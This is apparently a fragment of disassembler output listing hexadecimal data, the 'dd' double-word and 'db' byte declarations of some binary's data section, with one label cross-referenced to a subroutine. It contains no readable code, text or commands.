		dd 0ACCF861Eh, 9767C57Dh, 73C7E1A4h, 0BEC956C0h, 0AC559CEh
		dd 0BD84E847h, 0B8BC98E8h, 0EBD9783Ch, 92FC0FDCh, 0B3E611F8h
		dd 0CDE82A4Eh, 0E0767A2h, 9BCBDB89h, 2DFFB31Ah,	0BC3D5CB3h
		dd 320A4A26h, 6A31194Fh, 8EB6B66Bh, 3015CAEDh, 941E0D72h
		dd 0F4FE9257h, 20DB2C72h, 0E6C15396h, 0BAB2E9C1h, 0F8DF9F67h
		dd 3EE9F5E1h, 0CCF88BFFh, 17DBBC1h, 0F89F6EF3h,	0E26E300Ch
		dd 0E7577DA4h, 2BAEAA93h
		dd 6FA775DEh, 99C42D78h, 45099C45h, 0E5245DE9h,	7B9045FCh
		dd 6563BF85h, 2CBE4E84h, 3E57E519h, 0C1AFBDA0h,	46239F43h
		dd 0DAD656C5h, 39476545h, 0FBC0121Eh, 0FBFDB667h, 0AFC6FD8Bh
		dd 848119BCh, 0BF665CAAh, 3BEC5634h, 94D8A67Bh,	0C4BA2C39h
		dd 0E602C70Bh, 0E5DC92E2h, 0FC059781h, 0AFCD7805h, 5F87FD73h
		dd 7A247F1Eh, 3E662D83h, 362E91B3h, 753926D8h, 1208D6DDh
		dd 1F7BFF9Bh, 8B18E8B3h, 0B7757BD3h, 3F176BE2h,	0F86C5944h
		dd 5817317Dh, 15973D1Ch, 49DCCEAEh, 9D444DECh, 95201D88h
		dd 2C34E7D7h, 0FC5F23Eh, 9AB456B5h, 5F799268h, 0E4634D6Ah
		dd 1CBD9CAFh, 70F79187h, 0DD29906Ah, 8F0CD17Ch,	1A5FD432h
		dd 21343793h, 0F75CD31h, 0C4538680h, 8ED8A353h,	4A16304Eh
		dd 0D378DEABh, 7405DFDFh, 89D6B57Dh, 0AE71DA1Fh, 776D53C8h
		dd 62D5C963h, 0B386BABFh, 76E4791Bh, 0F9B61768h, 0B1AEBFDAh
		dd 90C972FDh, 5099AC57h, 6EB9631h, 6453373Dh, 0DF7ED351h
		dd 0E3D928ADh, 0B2A0BE07h, 9F68A656h, 0A2119263h, 0D28193EFh
		dd 0FB17D596h, 0EDB44CA1h, 25FBFBBFh, 85293C22h, 1C31989Dh
		dd 37D01D14h, 0BDB154CDh, 0D57CBF0Bh, 8B8BCEC2h, 0C37C2A52h
		dd 0FB0764E8h, 0A20314B5h, 49F48055h, 77F6E0CDh, 7FC7F0A3h
		dd 9BC5611Bh, 0D7F1356Ah, 0DE3D8B9Bh, 862AB448h, 8E6D90DEh
		dd 5B2BC469h, 4CF7350Eh, 0A62A0E3Dh, 1FEF0D53h,	581E6869h
		dd 7178C2FDh, 3F160EE2h, 0DA23C997h, 6E8C82D2h,	32B3E3Eh
		dd 836EDFE5h, 3ED5978h,	3A1C252Bh, 465B92C1h, 0CAFD2DCEh
		dd 1E5FC5D3h, 0A14E16DAh, 9C2BFAAAh, 2082A52Bh,	0D80D7BADh
		dd 0F59E4AEDh, 98F30152h, 0C1AD8F01h, 0E80B65CAh, 0BE18B49Fh
		dd 87687B15h, 0F430D121h, 9D6B3291h, 78203F7Eh,	3F184B3Ch
		dd 0CA68B4E7h, 0EA739A46h, 0DACF972Bh, 16CD8F33h, 0EE4C780Ah
		dd 27597478h, 62B226F5h, 572E8F09h, 7E86B68Fh, 0FB6DC77Bh
		dd 0B0D5CC16h, 851CBB68h, 4D00E771h, 8CAE1563h,	44971F22h
		dd 0BF73593h, 0D228A2EBh, 3913E079h, 8FD62E7Bh,	45A9FAA8h
		dd 0FB7A73DCh, 0E43CFAD0h, 47F8816Ch, 0FA989D11h, 7B2CBC71h
		dd 0B75075AFh, 0EDA2CE49h, 957B652Fh, 0FB520CDCh, 607D44AAh
		dd 4FCDEDB3h, 3672FABAh, 93B0D568h, 0C0C2F33Dh,	606F6069h
		dd 73DFB5ACh, 39AEBF85h, 0CEB318BFh, 352FF8BBh,	1C8DFA76h
		dd 8156E933h, 3F4E091Bh, 54AD398Ah, 0EEBD9EAFh,	0CFB6B298h
		dd 0C4ED1518h, 0E041CD68h, 0CA853AB9h, 6FA2E0F5h, 0C82BE14Ah
		dd 3C75CD9Dh, 95DC478Dh, 0A3CF259Ah, 3DA67677h,	8BB819FDh
		dd 0C9FA190h, 0F294FC0Dh, 54259976h, 50F6B595h,	288507BFh
		dd 0AD5E7600h, 0D8D54FE6h, 45DE98B5h, 0DFE52334h, 880F4118h
		dd 0CF6076ECh, 0EA28EE27h, 0F58A42C8h, 611C2568h, 801237B3h
		dd 460AA5BBh, 0A74C9855h, 0BAFC8C49h, 0D6771252h, 0BA36AA91h
		dd 927B3B05h, 576A9055h, 65256025h, 9311D989h, 7E10AF0Ah
		dd 0BAEE4647h, 0ABB27A8Ah, 83AA5268h, 0D47631C1h, 0D7CDAC33h
		dd 38FB7AC8h, 77F59DA2h, 946C8432h, 0EAB7D523h,	3835FCB6h
		dd 8CCC9A47h, 0A96906AAh, 0E8AF7A88h, 0D74CD52Dh, 23074D0Fh
		dd 2F1D08E4h, 44BB78FAh, 0D6A0345Eh, 789D9F15h,	0B28BEE17h
		dd 0F9A06507h, 7506969h, 0DAD5FEB5h, 0F488F70Eh, 0E8D04A66h
		dd 0D737D6Fh, 85A29907h, 0F52E124Ah, 2ED4A32Dh,	40758D05h
		dd 0DC7CB236h, 6A9F4CC5h, 0E5A6498Ch, 894B251h,	1127E26Fh
		dd 5892E579h, 9C1F5457h, 57852451h, 5B7A13F1h, 5632B966h
		dd 0C8491B61h, 9AC2F768h, 1657ECFBh, 768DEE0Bh,	90F99982h
		dd 771B2F6Ch, 0F9217937h, 5516B7FAh, 0FBBE4B1h,	0DE414AACh
		dd 0A696494Fh, 0A8EE8BFDh, 29EBCE1Ah, 0D82F1CD9h, 29553080h
		dd 0F7D0F898h, 72AF88B4h, 6065D145h, 46DD0943h,	630124B6h
		dd 892B1A9Dh, 0B50F5E6Eh, 366EAC9Ah, 3DAEC46Ah,	0F2AE14Fh
		dd 8E5BD53Ch, 0A02BE796h, 1FDFDA9Eh, 1E66FDA1h,	5328E4CEh
		dd 0FD7DDD53h, 465700D7h, 0E4A2822Eh, 0AE498AE2h, 0F0780505h
		dd 36DEE7FAh, 7C524B00h, 5B59A98Dh, 0A9060B44h,	86073CC3h
		dd 225FD18Bh, 8943D147h, 3EC814D3h, 7575AEC3h, 0D1614D6Dh
		dd 72DD1F02h, 0A90BC232h, 964C282Bh, 9E4722BBh,	666DA5D6h
		dd 23A55C46h, 0D8611895h, 2549BBE6h, 0B0B39B86h, 23CF9C99h
		dd 92ED43F2h, 0A05E3B66h, 0FD51204Eh, 0E2DF567Eh, 9331C08Ah
		dd 2AEAA038h, 0FEEFE19Fh, 17584C79h, 447DF304h,	271ADD5h
		dd 0B8646E9Fh, 0AC6BAF0Eh, 0CAB4B186h, 0A41044A0h, 3CD74E61h
		dd 0E5138A1Ch, 91FB5D74h, 99C47D09h, 36D481A6h,	8973C0F6h
		dd 96622D8Eh, 0A5DEF06Bh, 90F110BDh, 20337FCAh,	47EA426Dh
		dd 0F55FD4D5h, 98196275h, 5D3A28C4h, 6FBAD4D1h,	56B5F15Dh
		dd 15DFF14h, 966B682Eh,	86E2AA6h, 0B417F715h, 2846CB32h
		dd 81EA9785h, 9E55A7ECh, 4A6D1DBh, 709FFBCDh, 0F778FFB8h
		dd 5AD99323h, 8922843Bh, 0D9DF4E4Dh, 3EBF9712h,	0F685992Ah
		dd 0AAFDB882h, 0F85D5766h, 7E4A02A2h, 1646CBBCh, 647D6993h
		dd 20743F9Dh, 5F2F64CDh, 0B0B45164h, 5F59CAD9h,	496D7863h
		dd 6FCEEB4Bh, 33FD5080h, 22F309D7h, 81FE3D0Fh, 5CC53DA4h
		dd 0BC229B11h, 6640D335h, 0F1198997h, 0FC74F5EDh, 19DCC2A5h
		dd 0A3B27D66h, 0D42D9C88h, 0BD848160h, 3A4AAF7Eh, 43C00263h
		dd 6C5C1F30h, 82D9C636h, 2B5AD32Ch, 0FD97BD65h,	0DA5C1242h
		dd 137FA4D4h, 0F78B1F11h, 5B0A90A6h, 0E5F9FEE0h, 4675C28Fh
		dd 3D4EEBB2h, 21E960D8h, 0A7D22DF4h, 3E3084ADh,	2CAAB6BAh
		dd 0AEC2EF5Ch, 0D2DE2EE9h, 0E95F32FCh, 49A2D31Ch, 0A0725D48h
		dd 0F159CB8Ch, 7A5A960Ch, 3376CB92h, 11E81A5Dh,	0B16A297Fh
		dd 6B2000A3h, 1CA9DECFh, 6F8EE61Ah, 0D0D90B50h,	0A0AA9EEEh
		dd 12AB729Fh, 1955A623h, 18B7AC21h, 7EB2C815h, 8981325Fh
		dd 0DA2CA05h, 3C5A2A3Dh, 0E17B895Ah, 7B0DDACDh,	4C29AA22h
		dd 4258A464h, 8D5A7DB4h, 7381396Ch, 63846DBDh, 0F371AADBh
		dd 6C3A6309h, 0F754CB6Ch, 2FBD46F9h, 0C573C92Eh, 0D4185EC4h
		dd 74F416E7h, 995EB01Bh, 0AD07A0FCh, 0CE89D6Dh,	0F06DF0E4h
		dd 8BC595F0h, 0DAD85BA2h, 6F1D858Eh, 0A757A96Ah, 4C124987h
		dd 16F8E5FCh, 0F0F2FA30h, 0DC575039h, 235C4DA0h, 898F62B1h
		dd 20ABF809h, 61BD60AFh, 0F993F55Bh, 99BE8B8Bh,	0D572C41Ah
		dd 25DAB371h, 0C4137BBDh, 0DF2C09E8h, 3398EB18h, 390EB99Ch
		dd 0CA741294h, 7DEBA73Eh, 3C3FE5B5h, 0A60A38BEh, 0F0A70D12h
		dd 8867DEDBh, 511FD18Ah, 8BFA29F5h, 9FA0EE07h, 296295FDh
		dd 0CCC5BB15h, 770204A1h, 0EDAD6E4Dh, 0B6C6CA74h, 4953838Dh
		dd 7A947623h, 0B9E26CBh, 28794726h, 0C8AD0FD3h,	0E8453502h
		dd 0A91B115Dh, 0A2B50964h, 687E88EEh, 69FD20B4h, 0F25D2B10h
		dd 9B13DAB2h, 38B4970Ch, 0E607ECA6h, 0B4699D6Ch, 3747E3FDh
		dd 2CC43B53h, 3312A126h, 56E65F1Eh, 9C894D9Fh, 0EA5ACBCEh
		dd 7975177Eh, 96CF4D15h, 0EBEE6A95h, 0F6B26D42h, 6FB61A78h
		dd 30FFAD2Bh, 7A18C859h, 122E15B7h, 0EC3EEECEh,	15A38971h
		dd 0B9E0EF57h, 98AC5F0Fh, 8385D55Eh, 99030F8Eh,	0EA5FC72h
		dd 6A7A253Ah, 0B5D7F42Dh, 19C5311Ch, 553D11ABh,	64103E9Ah
		dd 0AF5C87E0h, 0F09A684h, 5A2D4CD6h, 84EB0450h,	157518CDh
		dd 0D81F6CA1h, 50FDB979h, 2ECDA385h, 0DE375A65h, 989855E0h
		dd 96DF1E8Ch, 47601AF5h
		dd 5F79E7E3h, 1DE0DD53h, 0CF5236FAh, 0BB0F2FC7h, 8C2F5556h
		dd 0E167F640h, 9FB7F533h, 9BCF4103h, 3399DA9h, 8F6ECF30h
		dd 0A9921CB1h, 0F03B7E91h, 56C56FA0h, 742D1466h, 494A826Ch
		dd 0CE36AB9Fh, 6448BE27h, 0BC376DEh, 0D1DC95ADh, 0E29AB57Ah
		dd 93AC72E8h, 9B5DC697h, 0E746C8B1h, 72E2B763h,	1688A2A2h
		dd 39092C19h, 909E6226h, 42EC824Dh, 0D178C5F2h,	9603C4Ah
		dd 9B5DA6FAh, 0D1112D5Bh, 75AC26EAh, 0BF02F08Ch, 31B3916Fh
		dd 0AD0C8099h, 0F607E1EBh, 0BE449EA8h, 2414F1D2h, 0D5E774Bh
		dd 837EE617h, 240A9453h, 2AC7AAECh, 0B78AB6AAh,	0BCC9FDAEh
		dd 0B1C387D2h, 1A26B65h, 0A92D859Dh, 0FBF4A5Bh,	665ED502h
		dd 0EAE50C89h, 274D0353h, 0DECF436Bh, 5FCD1010h, 62BADEB6h
		dd 0DE2DDEADh, 0B409E5F9h, 46128687h, 0E2FE126Fh, 6B19CF34h
		dd 0ED365A09h, 78FEAE1Bh, 5B2F35A3h, 1CFACC22h,	0E13EEC50h
		dd 6E340D4Eh, 68C9C2BEh, 0E5690BB7h, 0B5585398h, 846243C7h
		dd 0BFF777C3h, 3B281889h, 2498009Dh, 0CE6AB248h, 0CEE32C94h
		dd 8DD8E869h, 0F424BE62h, 52B3976Dh, 9B14FB53h,	0DC4E9EC2h
		dd 8FF2D134h, 0CCF0FF4Ah, 2AAA5463h, 72D7169Ch,	2CD46EAFh
		dd 99BC6A79h, 0E4D57398h, 0ED4A700Bh, 8594918Ch, 9D521647h
		dd 0F8BCAA79h, 0A44BC63Dh, 51B54A95h, 231D8ABCh, 0E8221A08h
		dd 0F6BFF883h, 391940ABh, 5BD9DA22h, 9913940Dh,	0C628220Ch
		dd 5C170F85h, 168CF72h,	56A8631Eh, 1263685h, 0E07C07FEh
		dd 6B1F994Dh, 0ECA9CD69h, 0C379C933h, 5C6A1527h, 1FF2F3E1h
		dd 5F87F68Ch, 71072369h, 0D19E681Ch, 0F4C00582h, 0FEBF7586h
		dd 5CA7D409h, 8D43B3F7h, 28B4AA36h, 59F2707Fh, 115FF2FEh
		dd 80E7CA17h, 25EE2FDCh, 727C617Fh, 0EEB84538h,	0BABD04FBh
		dd 99AF23B7h, 0AE9B3B52h, 6BEABDF0h, 653BDDC0h,	0E806E2ADh
		dd 873C4BF8h, 7AF136F9h, 0C531742Ah, 52E4327Fh,	53E51541h
		dd 2C32467Ah, 0F2E70CFh, 3BC8563Eh, 0B16B37C1h,	0A82AE15Fh
		dd 0CE63B9C4h, 0C846B289h, 1D47F76Dh, 155EA95Dh, 0D3E88296h
		dd 3AF9B148h, 0FDFAEC27h, 0D4DF8AA2h, 0A45A7E02h, 2BDCACCFh
		dd 0A30DAAF9h, 0ADB63F0Dh, 0BDA33E67h, 0A9B7FE85h, 0F6C82BBEh
		dd 97D2CA3Fh, 0A2C28CADh, 0AA8FB25Dh, 67FA2B54h, 639CF8FAh
		dd 55CC89C4h, 2B562349h, 474F513Ch, 4C40C50Eh, 0A5B5DBB2h
		dd 97DE6058h, 9BD852D7h, 0B4FA6A16h, 6ABEEE71h,	299CDBD4h
		dd 1A05CD5Ah, 9C975689h, 5145F5A9h, 0D5EB656Ah,	190CB2D2h
		dd 0BC8AA2D9h, 3FF60C44h, 198F9D05h, 0F4CC2936h, 814B33A3h
		dd 186980A7h, 1A321AEDh, 3A8A19A3h, 0A6844AF9h,	9236E082h
		dd 37C10F99h, 6F06771Bh, 7BB3FC65h, 7DF807AEh, 778D9CA8h
		dd 0AE04B2F8h, 9358D8AAh, 0B2539D9Fh, 8E2EAC3h,	72FE5A1Dh
		dd 4A6720BAh, 58E52F94h, 0BD55632Eh, 89E200AFh,	2C99AA0Ch
		dd 0B32B5DFBh, 1D81A768h, 8959871Ah, 355EFB40h,	4C782110h
		dd 0CC9A0E68h, 0D48F4437h, 64353129h, 0FC41130Ah, 8AE72710h
		dd 0B7D68020h, 8CC32737h, 0F4C96099h, 0EABA0395h, 10B62679h
		dd 761F9228h, 0B4ED9A56h, 65AB8DAEh, 734D604Fh,	0C9F6F89Fh
		dd 0CAD46433h, 6E7728F4h, 95869FA3h, 0DB85CE24h, 0A1C3CCBBh
		dd 28DB0E93h, 0FEFBA1B3h, 2481A159h, 288D7EAh, 8B725B6Dh
		dd 55195E75h, 4822BFABh, 0AAB4980Ch, 16E899E2h,	42B5FEB0h
		dd 82F56F0Ah, 0D257DA1Fh, 0F29FCA43h, 0CF41F3E0h, 1130CBFCh
		dd 15C99FCAh, 83139C0h,	0E01B421Ah, 916A94D6h, 897130AAh
		dd 0FC7F75A9h, 0E881B270h, 0A59D735Ch, 9F4AB29Dh, 5A29B5FEh
		dd 6EB5BEC8h, 29D31DFBh, 0E74D7E7Ah, 0BF882E82h, 0C97F60E8h
		dd 0BACC206Ch, 57E2804Ah, 80ADEDB9h, 4DEB3399h,	0DD5B7AE0h
		dd 929BBAF7h, 0F9E5258Ch, 0AED62F3Fh, 0DCE65D1Fh, 290DC31Fh
		dd 1CEFC57h, 7B2EA287h,	0E7ED5714h, 52D03B4Dh, 8EE1D486h
		dd 6E68521Fh, 8F2ED914h, 0EDAEB7DFh, 31B1C8EDh,	1C5206D5h
		dd 66D129D1h, 0BE0FDD75h, 8128B21Dh, 3DFE1E27h,	0B5337A37h
		dd 88D53D67h, 0BD912AACh, 37D4F5F4h, 9B764FBDh,	530500B8h
		dd 2C34140Ch, 35F2D977h, 358EB46Dh, 0D2B0550h, 0DCE7F154h
		dd 0EC406501h, 0B03E5155h, 2B0DEDDBh, 0C17E58F4h, 0D21CB281h
		dd 0B4972ECAh, 0EA393FF2h, 0AF46E059h, 0E7B1CEAh, 0C3D9978Eh
		dd 4C8BCF55h, 0BDDE9C79h, 0EFC02E27h, 3518EC33h, 0E13AB9F6h
		dd 6E1F902Dh, 0ABA956C5h, 60D74BA2h, 2F84E007h,	2F657A93h
		dd 8A4E36E2h, 72A8EFFBh, 0BF571F63h, 3BD0DA38h,	0D0E04AA5h
		dd 0E21F27D2h, 0A93979EDh, 0E0DF021h, 4AD52E0Fh, 0A16A87E4h
		dd 131DAD1Bh, 0A9BB5E05h, 812C76C6h, 2B47A3F3h,	0D8FA4F59h
		dd 2F9FCB28h, 82D77866h, 78108A0h, 0F5D59CC7h, 28BE10FBh
		dd 0DD6AD4B0h, 8DBBBF57h, 33E3DB9Fh, 5203652Ah,	6CBD5594h
		dd 90321F62h, 0FDD655F4h, 754EFEFEh, 5DBCEF56h,	0FD8647AFh
		dd 0C5DD3AD8h, 0F4D1922Bh, 6A1B7F5Eh, 0F58C7358h, 0B460DD01h
		dd 0BFCD2BB7h, 0BE87ED2h, 0D5BCE77Fh, 5AA329ACh, 0CE56EBA9h
		dd 0A9661869h, 5D3A4D9Eh, 1AEFDDC4h, 0D6650730h, 0B0C6B185h
		dd 0C2EDBA78h, 4BBADE2Ch, 0CB01F514h, 4E56BB93h, 135D017Dh
		dd 9449D0BCh, 0A499B972h, 0D2391F46h, 9A9C3981h, 360D648Ch
		dd 0B1060EDBh, 0BE6B39B1h, 8FD96ADFh, 0F9798768h, 12B2AB45h
		dd 0ECB49F5Ch, 0F6BB0611h, 9BB05170h, 3FAD5128h, 2B463D65h
		dd 825F52D5h, 83BD6F15h, 646F1C92h, 898F87E3h, 7A5DD79h
		dd 0E2C8B170h, 3D8A7587h, 0EBE0FB9Eh, 78EDC21Fh, 23E7791Fh
		dd 352B8E8Dh, 0F3913A12h, 12F12ABh, 32A266A6h, 0C31B63C2h
		dd 15A4296h, 25A059Fh, 0F4513EC9h, 981F68E8h, 2A0F7C1Ch
		dd 0CADE2CC7h, 0AFF88DC9h, 17179CEEh, 0E7353327h, 0BA46E582h
		dd 0E0DC08D8h, 6C4D07E7h, 35C660A9h, 76B4134Bh,	0AA98D6B8h
		dd 7C9BAEEh, 64F65F05h,	0B15B7D36h, 0A0DA649Fh,	635FB74Fh
		dd 0DC4B558Bh, 0F5DC3A9Dh, 1367FAA2h, 0E7ECDBB5h, 8DB94C1Ch
		dd 0FA81A572h, 0C4FF7F0Ch, 0D58879B2h, 6C5F267Dh, 0A1E98F16h
		dd 0B5AF8D75h, 0F64EA54Bh, 6F839B89h, 42D3D20h,	2BCE3A9Eh
		dd 66C1175Fh, 570AF27Eh, 4B69812Bh, 90692391h, 71D73F14h
		dd 772BAC33h, 0F48EDEE3h, 9356ACDAh, 257E1F8Ch,	62A98ADh
		dd 34D4F55Dh, 0D3B1D19Ah, 0EF682A1Fh, 0E5A33A5Fh, 0BC16D7ECh
		dd 0A47CBDD5h, 291C4C0h, 654FB649h, 0BA23ACA4h,	37E8CA2Ch
		dd 0D1382D29h, 0ACF82D0Bh, 3EF31C4h, 16E1FC7h, 0A8944191h
		dd 0F27F676Ch, 55DC0A89h, 1D477DD8h, 8C9EE19Bh,	6B66EABCh
		dd 4E6F73Dh, 8E1AAE83h,	999934D3h, 38363493h, 4F5ADDD0h
		dd 5C5FFF29h, 0A3DAB759h, 9412F1C9h, 0D6F9F02Dh, 72F7770Fh
		dd 0D85DE1EDh, 1EE66D50h, 0E61F2D45h, 0CB70ED2Eh, 913B919Bh
		dd 3DE026A1h, 0D567429Bh, 0F0A7DDE2h, 0F9A40251h, 7307CEA8h
		dd 0AB05FEE4h, 81601EA0h, 64986906h, 0DCF14BC7h, 5000083Bh
		dd 0C4C2A088h, 0CB3CC2B1h, 0B7384658h, 570EB54Eh, 5B92122Ah
		dd 1B1C3429h, 7A73B571h, 0B3BD55B4h, 6136A852h,	4AF1285h
		dd 649097FDh, 9066AB8Fh, 5A2A96D8h, 0B55C10B2h,	21B9976Ah
		dd 1C5B727h, 9FC38AAFh,	9DABE63h, 0BF128655h, 0B271F4BFh
		dd 0B5986AA8h, 92FE2FA6h, 68A0A380h, 0D0925149h, 0CE6A2EA2h
		dd 280E18A0h, 106DA194h, 0F0942DFEh, 0E53C24CCh, 0B16B1FF3h
		dd 0D1CE2A4Fh, 0FA4BBABFh
		dd 773B7FBCh, 0D0194521h, 0BD2594B9h, 9D844834h, 3C6449C1h
		dd 24B5F657h, 5AAC98ABh, 547722ABh, 0D21C322Eh,	4FCD5DCCh
		dd 748BEE0Eh, 4AFEAB64h, 6A90F826h, 128C3849h, 924755CDh
		dd 0F0F26654h, 5E616CDEh, 16D16D52h, 17E07F8Fh,	992693ECh
		dd 7F88C72Fh, 0D9C5652h, 8FD1A039h, 2D57728Ch, 0EEEFCE9Eh
		dd 38BDC938h, 0D9F11891h, 95939BE2h, 38EFD1h, 44187C99h
		dd 21884AE9h, 0B5AB8A57h, 14382A70h, 2D346C1Ah,	0BDA2EE27h
		dd 0CD68C3AAh, 9D6F32C4h, 781E895Bh, 0D476B921h, 2F5B1DE7h
		dd 24AB0F03h, 16F4753Dh, 0EBFC479Fh, 438629Ch, 0BC93F2B9h
		dd 2CB5C76Dh, 0CB9D886Bh, 188B2593h, 9BB9821Fh,	0D5B3FD8Ch
		dd 6C52DF0Dh, 0B159180Bh, 0BAD97F1h, 0FCB85057h, 64417F97h
		dd 0B7133732h, 0CAAA212Eh, 385B4C2Eh, 0E8781020h, 5E25748Fh
		dd 53CFD689h, 0B8B9F6EFh, 7E06C364h, 33FA7555h,	2D9257Ch
		dd 0D1B62B54h, 153237DEh, 7C785F48h, 0D5F18C3h,	18FBB66Eh
		dd 0B9CF7DE3h, 0DD63D0FEh, 673520E6h, 3F596A14h, 4EB6CA85h
		dd 0D4B00C5Fh, 7EBCAAF5h, 2DBC957Fh, 0F86371F9h, 22E764ECh
		dd 7355A394h, 8D6F48F5h, 0EF9F645h, 0FC2A4C32h,	327BEF7h
		dd 8211A5A3h, 0B5520D77h, 94498FE3h, 0A668FCEEh, 23601BCDh
		dd 0C97F0CDCh, 81A3E6ABh, 925D591Bh, 0B0DED4C2h, 6995E3B1h
		dd 3F50A9EDh, 3EB22375h, 8A9A6449h, 1267BEBEh, 255450B1h
		dd 9C7452A3h, 6FBCE7EFh, 93E8BDBh, 0FF9D5764h, 2EC61CECh
		dd 15E65DBAh, 43DB785Ch, 1E349D8Ah, 0AEAC724Ch,	13D9A574h
		dd 9A2C443Fh, 0C0C985ABh, 0ACBEBF85h, 81A5A93Dh, 0E07EE130h
		dd 0BC851ECFh, 13DF78F9h, 2BCFDF39h, 325C1D11h,	0CE620DFFh
		dd 6D95F6F3h, 0F94B69A3h, 644CB2AAh, 3A3079FEh,	3151A8DAh
		dd 0E2D587Dh, 5AAA9B68h, 0FB99F45Fh, 0A4A955BCh, 484B1D62h
		dd 1DD8AA14h, 337F51D6h, 22D9FCC4h, 0AAB9BF97h,	6C685C5Ah
		dd 6A35B7D9h, 0F39622D0h, 0B1F26862h, 0DA7EEF8Bh, 0A51F56BDh
		dd 0EE344330h, 0AAD4951Fh, 8689E076h, 78993550h, 0BBE4ECD7h
		dd 5B4C396h, 243D3F07h,	1C4CAAE4h, 0C0B8B15Dh, 774FC303h
		dd 23DFF32Fh, 0E42CB978h, 4B4B6B43h, 52959D99h,	124851A9h
		dd 0F4FEE07Ch, 68D59F4Bh, 30D2044Dh, 0AC0BFAD4h, 0F1705D1h
		dd 6F1F247Bh, 0C9F6C729h, 74FF0DBEh, 0B6B9F9B3h, 1ADC8D50h
		dd 1897D2Dh, 53265D5Fh,	0FF9D9F3Dh, 0DDB15238h,	0EF234D7Fh
		dd 2DC47A9Eh, 0D3308E22h, 4381149Eh, 0A05F4C53h, 4095E163h
		dd 0B06359Fh, 0DDAF2608h, 0C59D6288h, 8B435E07h, 45FEBBC3h
		dd 0EF7EF016h, 86CCB913h, 6C72642Ch, 77B5D894h,	0C8BFA009h
		dd 62A64E35h, 0F1BA8C80h, 0BC8FBAD9h, 85DD7BC3h, 26779175h
		dd 0BEEFA96Bh, 463703F0h, 0D70720B3h, 223B0BF7h, 0FBF58277h
		dd 0C7958BC8h, 0AFB3F0EBh, 5D2711C9h, 556D9CD2h, 0D768C6D1h
		dd 1B0B853Fh, 3E1AD43Fh, 0DD998A8Ch, 9287E4AFh,	0AFF1FDF7h
		dd 0FE68E1FDh, 9FBDE49Bh, 0C1E3FC6Ch, 7B95133Bh, 0DD4946CAh
		dd 0A654AF78h, 1FD55BACh, 0DA3C2CE6h, 0ED8913E2h, 0D25B79DAh
		dd 0CFDBCB86h, 2299DCF7h, 0C6FA5E09h, 70B68165h, 0BEF8A044h
		dd 476C9AAAh, 0F511EE0Bh, 485312BCh, 0A9AE5375h, 0D0D94752h
		dd 88B52DFEh, 0EF992A76h, 0D776031Eh, 6936398Ch, 0DD6EA443h
		dd 0F70EA385h, 5AB0F71Bh, 628041Dh, 8C5BACDEh, 41900E9Fh
		dd 19662B4Ch, 0F2509C0Bh, 5B88127Dh, 23E2DCAEh,	8AD1B712h
		dd 37CE5D38h, 2BF0A283h, 94FD932Dh, 0B96F2CCEh,	0E65268ABh
		dd 7027B4AAh, 9DFB4B04h, 248B6815h, 6F39EA66h, 0EC455F39h
		dd 0EA4514C2h, 25D078D3h, 1977728Fh, 0FBF77435h, 0C5860933h
		dd 60E586BFh, 9F445569h, 8847BF1h, 0C513A23Bh, 0AEB8A6FAh
		dd 0E67C5630h, 0A7EFDB4Ah, 9A1DDBEh, 8DA9E694h,	2BCB734Bh
		dd 883C4C31h, 0B46C35B1h, 0EB7681Eh, 78CB8C0Bh,	14DD4F61h
		dd 3105F48Ah, 534FF569h, 8D94740Ch, 0D5D15677h,	92E6DCh
		dd 0F728E24Ch, 5A76B61h, 0D58CF359h, 572717CCh,	16A6AFF5h
		dd 45D3D9B3h, 66D9EB94h, 8C3F7B60h, 0C696B79Dh,	0AFC707EFh
		dd 0B12ADF31h, 5D2CDDB8h, 1768BD3Ch, 87F9D2Eh, 5D402591h
		dd 598BCDF5h, 76B7C142h, 0E21E58B6h, 0F1E741Ch,	4B88FF36h
		dd 0B2D7E3B5h, 0DA52BD52h, 8A5525D3h, 14B52D15h, 1D7B82EEh
		dd 388D4E26h, 0EB6CDAA2h, 0ED74D603h, 0FD21EF2Ch, 729E2B12h
		dd 0B71E2095h, 14A7A262h, 6D1F0F02h, 320A675Dh,	903E2DB4h
		dd 440AF845h, 24FDBF2Eh, 3AA410F0h, 3F125966h, 508B234Dh
		dd 455F9BF5h, 0CD0ADBA2h, 0BC458E13h, 22746425h, 8E935D45h
		dd 0CDF0DB62h, 971C0D2Fh, 51B479B0h, 0D71D3A3Dh, 265879F0h
		dd 9CCB02E4h, 4912FB54h, 0ED1CAE59h, 0A374E5F0h, 6C6E2C26h
		dd 0B17FE390h
		db 0AAh
byte_47EF71	db 7Ch,	42h, 29h	; DATA XREF: sub_444C79+4o
		dd 0ACD804A6h, 0EEACBB21h, 0BE4B4D3Bh, 1DD44653h, 0F8DB6EBh
		dd 6EF3B9D8h, 0DB3E2AD0h, 6BBF92FDh, 9870A430h,	444C0BA4h
		dd 90778ABEh, 9058BD8Ah, 18FBAC43h, 24714E3Ch, 4FF59937h
		dd 0AFA1DA98h, 734C2BAEh, 0EE3FB047h, 2749BA91h, 4FD8F5D9h
		dd 0C46943AAh, 86E2BC15h, 2554736Dh, 0B896BBE2h, 0EF277A7Bh
		dd 0DE8D8C12h, 6AB4A91Dh, 5766B65Ah, 83BD074Ch,	34C5CB99h
		dd 883CA53Eh, 67A937Ch,	8CDEBE36h, 0C05B4FAFh, 286B7176h
		dd 6D755CC9h, 713D9384h, 8BBC4033h, 0FB430665h,	0CCEA2A31h
		dd 1E99CF4Ch, 0F17821ADh, 83F0BA2Ch, 68DB334Ch,	0EA80FC50h
		dd 66635822h, 0AF835231h, 1FABB954h, 17FC1906h,	3965E396h
		dd 0D7E16E3Ch, 8FD06362h, 4047786Dh, 796CC90Dh,	0CCF7A5D9h
		dd 678C0528h, 0B2AAF187h, 66E4A9C6h, 172FF6D4h,	7C320EF2h
		dd 8055B03Eh, 0C3A58EA0h, 0A77A861h, 707DF131h,	47F6E548h
		dd 0E362F1EBh, 0F2A96317h, 62596AAEh, 4AF95481h, 96839755h
		dd 0AAE53DEBh, 0CFBF74B2h, 0E5C15698h, 17575703h, 7F687E75h
		dd 2C58389Bh, 0EACEF371h, 0B5627664h, 0E1208EEFh, 0AA2830F8h
		dd 0B4713D66h, 0AB3F5344h, 3DA357E0h, 6A1DD9DDh, 0B2629966h
		dd 4DAA3D4Ah, 319A9CF9h, 9CF16BDh, 8B769236h, 0AB42DCBAh
		dd 0F42E56CCh, 0DC1FA3B5h, 0F5A2A988h, 49F20429h, 7F9A0BFDh
		dd 142CE07Ch, 0E71AD169h, 16AFB48Dh, 0EAFD864Ah, 0C02CAF7h
		dd 566C90Eh, 0D22E3314h, 0E371F8Ch, 77EB4077h, 8FDF8128h
